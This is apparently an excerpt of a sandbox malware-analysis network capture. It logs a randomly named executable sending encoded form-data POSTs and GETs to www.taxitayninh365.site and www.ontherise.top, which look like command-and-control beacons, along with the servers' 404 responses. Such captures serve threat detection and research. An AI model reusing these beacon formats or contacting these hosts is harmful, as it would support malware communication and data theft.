                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Dec 9, 2024 09:12:26.804867983 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.450012103.75.185.22805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:27.900866032 CET10861OUTPOST /syud/ HTTP/1.1
                                                              Host: www.taxitayninh365.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.taxitayninh365.site
                                                              Referer: http://www.taxitayninh365.site/syud/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 64 73 67 36 65 53 57 30 68 6c 67 39 39 4d 79 2b 56 43 6f 33 35 61 75 54 4f 37 39 4a 47 6b 4f 52 37 69 72 30 56 54 52 51 71 4d 4a 4d 70 45 34 39 6e 6a 30 55 59 79 6d 63 30 63 70 53 52 45 75 76 57 52 6e 61 61 57 74 33 52 33 66 73 6c 67 47 31 48 77 4c 73 6b 6a 39 4b 50 56 67 6a 59 64 73 58 66 43 70 4a 5a 31 70 32 35 4b 45 7a 44 48 6e 5a 52 42 54 67 5a 42 66 43 65 51 61 75 72 4c 56 79 51 42 77 47 33 2f 6f 65 33 61 72 77 56 53 6d 58 2b 56 6a 2f 62 31 59 59 57 4f 37 66 45 41 74 6a 45 4d 32 68 6d 43 46 4c 6a 67 45 2b 72 72 4c 66 44 32 66 31 72 78 5a 33 30 4b 53 77 43 64 41 4a 39 42 4c 63 75 4a 36 68 51 2b 33 41 47 2f 7a 42 62 36 65 41 30 73 56 6e 36 33 65 53 34 56 68 67 6e 38 77 6e 30 53 51 42 69 71 6b 74 58 35 38 6f 74 62 58 63 49 6e 43 48 48 68 54 4f 79 39 5a 30 57 47 4b 4f 68 51 51 6a 50 2b 62 33 70 58 59 6d 45 34 6a 38 7a 4c 39 6c 77 30 59 45 4e 33 6f 4e 4d 2f 61 62 4a 2f 4f 47 43 35 35 5a 4e 74 77 44 61 43 46 71 67 64 76 6d 2f 5a 73 6f 71 [TRUNCATED]
                                                              Data Ascii: X25tIdT0=tyMI7ugAvLpMdsg6eSW0hlg99My+VCo35auTO79JGkOR7ir0VTRQqMJMpE49nj0UYymc0cpSREuvWRnaaWt3R3fslgG1HwLskj9KPVgjYdsXfCpJZ1p25KEzDHnZRBTgZBfCeQaurLVyQBwG3/oe3arwVSmX+Vj/b1YYWO7fEAtjEM2hmCFLjgE+rrLfD2f1rxZ30KSwCdAJ9BLcuJ6hQ+3AG/zBb6eA0sVn63eS4Vhgn8wn0SQBiqktX58otbXcInCHHhTOy9Z0WGKOhQQjP+b3pXYmE4j8zL9lw0YEN3oNM/abJ/OGC55ZNtwDaCFqgdvm/ZsoqALozbgcLb5wLBiMvIewk3gjB6qpCphUIPzhaIIp+ulVB04vTF9XfaL8LDOIt+B/3jIIF0UM1n4yo2oLf0xrVIK4bKNO6lOWmDp/+JdsgfDiCjZKLlPn5GxsqUkFrSqM1RPoPlRvmfioYxe8OiERt9H8NoDdpvRp1WT5as16UlCIf0ZHptScsi8hdS8F63/xx5oatD0DWy4piNfFGfn9PepRv+BGBlhQkjxpDRs6Egens/rhMRSnfApij1hyMr0tV9xtKZMwL04qpMo9WWPVsIwxVqXSYrLakp3iQ/l5q8tEjlxGZ29BrZfBnKDyFST+Qm5zZWsGL8p7bmUyPqgsJq02U20kShIpeTGOYGEHYQD1Ay1WlapLmUbtUYX2J9EslBRbToXzGj7IXqIdtTLiXqGzPudEwfpBXL1chQODUZoE0d5yMk2sMvPu7TyGiqYd+r8knIIOFbC9VxDpj3FEWi5d6BeJLPIerPIWA+2pcbx8aH4YzbE4nA6fD76LAEww/IxSPXZqu8YhGWCmhPXZ8XOSxcjfJUMTOPMEPOwViMCH1XO/HF35gVIHvNsFpgaUvveTayYvyCU+PKN9OIJsd5SqqdieoKzshHfZ+ZVUkiHl9TUsP93pJIgZoo0E12489/0Ry4irZOu74Yhd3orVRQbZqfnebq5O8oS [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.450018103.75.185.22805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:30.549448967 CET482OUTGET /syud/?X25tIdT0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.taxitayninh365.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:12:32.109389067 CET1236INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Mon, 09 Dec 2024 08:12:31 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Dec 9, 2024 09:12:32.109437943 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.450024162.0.213.94805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:37.657143116 CET741OUTPOST /wr6c/ HTTP/1.1
                                                              Host: www.ontherise.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.ontherise.top
                                                              Referer: http://www.ontherise.top/wr6c/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 43 30 78 6b 4c 79 47 43 67 6e 4b 71 34 62 41 47 6c 7a 41 49 72 36 63 2f 76 2f 47 66 78 49 78 31 74 6a 49 5a 4c 68 63 44 72 5a 30 46 57 49 36 79 5a 6e 4b 77 43 47 4f 72 6c 50 43 42 79 6b 31 65 31 72 54 35 52 45 41 49 75 57 67 65 54 47 76 58 63 73 37 5a 70 61 4d 52 77 55 65 6f 31 66 59 47 4e 46 52 66 44 42 53 68 55 59 53 4f 75 2f 35 65 5a 6e 70 75 49 44 69 70 6f 47 33 56 48 7a 4a 54 46 50 37 65 64 69 73 68 31 65 51 78 2b 78 6b 57 47 61 43 56 51 2f 6a 53 6c 47 61 62 61 79 34 6c 73 69 43 48 7a 46 41 79 49 34 56 47 65 2b 4c 69 62 2f 39 76 59 67 70 55 68 69 59 67 4c 63 46 49 52 77 3d 3d
                                                              Data Ascii: X25tIdT0=C0xkLyGCgnKq4bAGlzAIr6c/v/GfxIx1tjIZLhcDrZ0FWI6yZnKwCGOrlPCByk1e1rT5REAIuWgeTGvXcs7ZpaMRwUeo1fYGNFRfDBShUYSOu/5eZnpuIDipoG3VHzJTFP7edish1eQx+xkWGaCVQ/jSlGabay4lsiCHzFAyI4VGe+Lib/9vYgpUhiYgLcFIRw==
                                                              Dec 9, 2024 09:12:38.888055086 CET1236INHTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Dec 2024 08:12:38 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                              Dec 9, 2024 09:12:38.888160944 CET224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                              Dec 9, 2024 09:12:38.888174057 CET1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                                                              Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                              Dec 9, 2024 09:12:38.888446093 CET1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                                                              Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                                                              Dec 9, 2024 09:12:38.888458967 CET1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                                                              Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                              Dec 9, 2024 09:12:38.888469934 CET1236INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                              Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                              Dec 9, 2024 09:12:38.889301062 CET1236INData Raw: 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c
                                                              Data Ascii: 33" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034
                                                              Dec 9, 2024 09:12:38.889312983 CET552INData Raw: 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32
                                                              Data Ascii: 7.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoi
                                                              Dec 9, 2024 09:12:38.889322042 CET1236INData Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33
                                                              Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
                                                              Dec 9, 2024 09:12:38.889333010 CET224INData Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                              Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560"
                                                              Dec 9, 2024 09:12:39.008033991 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31
                                                              Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.450025162.0.213.94805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:40.347446918 CET761OUTPOST /wr6c/ HTTP/1.1
                                                              Host: www.ontherise.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.ontherise.top
                                                              Referer: http://www.ontherise.top/wr6c/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 43 30 78 6b 4c 79 47 43 67 6e 4b 71 35 36 77 47 6e 51 6f 49 67 36 63 2b 67 66 47 66 37 6f 78 78 74 6a 4d 5a 4c 6c 6c 49 6f 72 51 46 57 74 47 79 59 6d 4b 77 42 47 4f 72 78 66 43 41 76 55 31 5a 31 71 76 78 52 47 55 49 75 58 45 65 54 47 2f 58 63 62 50 61 72 4b 4d 54 39 30 66 4f 78 66 59 47 4e 46 52 66 44 42 57 48 55 59 36 4f 76 50 70 65 59 47 70 74 4c 44 69 75 2f 32 33 56 44 7a 49 59 46 50 36 4c 64 6a 77 50 31 64 34 78 2b 78 55 57 47 50 69 57 65 2f 6a 55 36 57 62 66 54 51 35 32 73 79 4c 75 34 6e 6f 44 43 49 4e 48 62 34 47 34 4b 4f 63 34 4b 67 4e 6e 38 6c 52 55 47 66 34 42 4b 77 54 38 61 51 59 4c 63 34 34 32 4a 36 36 32 78 61 65 56 37 65 49 3d
                                                              Data Ascii: X25tIdT0=C0xkLyGCgnKq56wGnQoIg6c+gfGf7oxxtjMZLllIorQFWtGyYmKwBGOrxfCAvU1Z1qvxRGUIuXEeTG/XcbParKMT90fOxfYGNFRfDBWHUY6OvPpeYGptLDiu/23VDzIYFP6LdjwP1d4x+xUWGPiWe/jU6WbfTQ52syLu4noDCINHb4G4KOc4KgNn8lRUGf4BKwT8aQYLc442J662xaeV7eI=
                                                              Dec 9, 2024 09:12:41.548085928 CET1236INHTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Dec 2024 08:12:41 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                              Dec 9, 2024 09:12:41.548204899 CET224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                              Dec 9, 2024 09:12:41.548216105 CET1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                                                              Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                              Dec 9, 2024 09:12:41.548430920 CET1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                                                              Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
